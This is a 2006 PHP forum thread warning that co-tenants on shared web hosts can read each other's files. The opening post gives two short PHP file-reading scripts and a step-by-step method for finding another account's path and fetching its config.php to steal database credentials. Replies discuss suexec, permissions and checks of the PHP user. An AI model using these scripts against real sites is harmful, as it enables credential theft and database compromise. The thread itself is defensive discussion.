Page 1 of 2

Security in shared web servers! be careful: everybody hack

Posted: Sun Jul 16, 2006 5:57 am
by sanbad
Hi

If your php portal install in a shared server you must be careful.
Other user that resident in your server (he has a hosting account on your server)can hack your portal!

How he can hack your portal?

By this script(script 1):

Code: Select all

<?php
if (isset($a) )
{
echo implode("", file("$a"));
}
?>
And by other one(script 2):

Code: Select all

<?php

    header('Content-Type: text/plain');
    readfile($_GET['a']);

?>
By these scripts , a user that resident in your server, can get your file or your code for exam he can get your config.php and see your database user & pass & name and down your data!!!

1- hacker must know your ID in your hosting so he recall one of php files that belong your portal in his browser:
for example:

Code: Select all

http://www.yourwebsite.com/forum/includes/functions.php?anyfunctionIntegerArgument=text
after this requesting; he see any error report like this:

Code: Select all

/home/yourID/public_html/forum/includes/functions.php  error 607 in line 563
Now he find your ID

2- Now he use one of these script for exam script 1 like in this case:

Code: Select all

http://www.hackerWebsite.com/script1.php?a=/home/yourID/public_html/forum/config.php
then he watch page source and read your db config informations!

3- by using a simple script he can download your db or he can write in your db and …
he can install the same portal and edit and change some code then he can use your encrypted-admin-password and login some times and…

how we can solve this problem?

1- we must add this codes to prologue of all php files:

Code: Select all

ini_set('display_errors', 'Off');
    ini_set('log_errors', 'On');
so hacker can not find your ID. And you can see error-log in Cpanel of your linux hosting.

2- You must rename your config.php file and edit all php file which include or require config.php file. Then you must encrypt these files by using zend-phpencoder or any other encoder programs.
So if a hacker find your ID he will not find your db config file

3- or using a dedicated server only for own.


In phpnuke if using nuke sentinel and IP-trakcer be on then all users' usernames and passwords ( even admin) insert in nuke_nsnst_tracked_ips !!!

So nuke owner or a hacker can see users password.

If you want register in portals you must use different password.
If your password is equal with your other important thing for exam equal with your email pass or domain-panel pass or your bank account hacker or nuke website owner can access that!

In other portals, owner can change scripts codes and find your password.

Posted: Sun Jul 16, 2006 6:50 am
by MarK (CZ)
I don't think that other account on the same server have rights to access my folders.
Maybe on some badly supervised servers.

Posted: Sun Jul 16, 2006 6:51 am
by AshrakTheWhite
you could just hash your password

Re: Security in shared web servers! be careful: everybody ha

Posted: Sun Jul 16, 2006 7:53 am
by aerodromoi
sanbad wrote:Hi

If your php portal install in a shared server you must be careful.
Other user that resident in your server (he has a hosting account on your server)can hack your portal!

How he can hack your portal?

By this script(script 1):

Code: Select all

<?php
if (isset($a) )
{
echo implode("", file("$a"));
}
?>
And by other one(script 2):

Code: Select all

<?php

    header('Content-Type: text/plain');
    readfile($_GET['a']);

?>
[...]
3- or using a dedicated server only for own.
Why would anybody in his or her right mind allow for snippets like the ones you've posted?
Shared hosting is always a compromise - but you have to validate user input nevertheless.

btw: As to your first script - you might want to take a look at http://de2.php.net/manual/en/ini.core.p ... er-globals.

Posted: Sun Jul 16, 2006 9:24 am
by Chris Corbyn
It's been a known problem for some time. Hosts who know what they're doing should use CGI and suexec in order to get PHP running under the userid of the account holder, this way you can remove the "x" execute permission from /home/<yourname> for everybody except yourself.

It would probably be good measuer to CHMOD all you files to remove all permissions for everybody except yourself too if you are in a CGI/suexec setup.

I'm more than aware that some shared hosts could care less about such issues after having my own website filled with trojan code on a number of occassions before telling my company to get stuffed and getting a VDS instead :)

Posted: Sun Jul 16, 2006 9:25 am
by Chris Corbyn
AshrakTheWhite wrote:you could just hash your password
That won't stop people getting your MySQL details. Even if you hashed that you'd have to use the hash to login so all it means is your password is the hash so it can still be stolen.

Posted: Mon Jul 17, 2006 7:42 am
by phppage
Ok, heard rumours about this but this is a worry. Would anyone have any further detailed documents regarding protecting sites from this? Would this be a worry on bluehost.com? Any penetration tests I could try without upsetting my hosting provider?

Posted: Mon Jul 17, 2006 8:18 am
by Chris Corbyn
phppage wrote:Ok, heard rumours about this but this is a worry. Would anyone have any further detailed documents regarding protecting sites from this? Would this be a worry on bluehost.com? Any penetration tests I could try without upsetting my hosting provider?
Just check if PHP is running under your own userid:

Code: Select all

echo `echo \$USER`;

Posted: Mon Jul 17, 2006 8:21 am
by Benjamin
I was playing around on a shared host the other day actually in ssh.

Code: Select all

#>updatedb
#>locate [censored] | less
etc. etc..

I notified the admin, not sure they will do anything about it though.

Posted: Mon Jul 17, 2006 12:45 pm
by phppage
d11wtq wrote:
phppage wrote:Ok, heard rumours about this but this is a worry. Would anyone have any further detailed documents regarding protecting sites from this? Would this be a worry on bluehost.com? Any penetration tests I could try without upsetting my hosting provider?
Just check if PHP is running under your own userid:

Code: Select all

echo `echo \$USER`;
I tried that , uploaded it to my website and ran it via a browser and it displayed nothing. What would that mean?

Posted: Mon Jul 17, 2006 12:48 pm
by phppage
I get this when I try to access SSH.
SSH/Shell Access

For security reasons, shell access is not enabled by default. In order to activate shell access on your account, you will need to fax or mail a copy of your driver's license, passport or other photo id to customer service. You can fax it to +1 (801) 765-1992 or email it to support@bluehost.com
I guess thats encouraging.

Posted: Mon Jul 17, 2006 4:10 pm
by Chris Corbyn
Hmm... you can create a file using PHP, then FTP to the server and look who owns that file (i.e. "nobody" or "wwW" vs "<your name>").

Posted: Mon Jul 17, 2006 5:49 pm
by phppage
I tend to get read access for Owner, Group and All Users all have read access but only owner has write access but nothing is selected for execute. However the owner is not defined?? This is using Windows standard FTP via Network places. Could I get more info do you think from a good ftp client?

Posted: Wed Jul 19, 2006 5:45 pm
by phppage
Seems like I am covered. Thanks for your help though. Weight off my mind.

http://www.bluehostforum.com/showthread.php?t=1551

Posted: Wed Jul 19, 2006 5:53 pm
by RobertGonzalez
I am pretty sure that iPowerweb is still vulnerable to this. One of my clients got zapped a few weeks ago. I had gotten hit several times before moving away from them.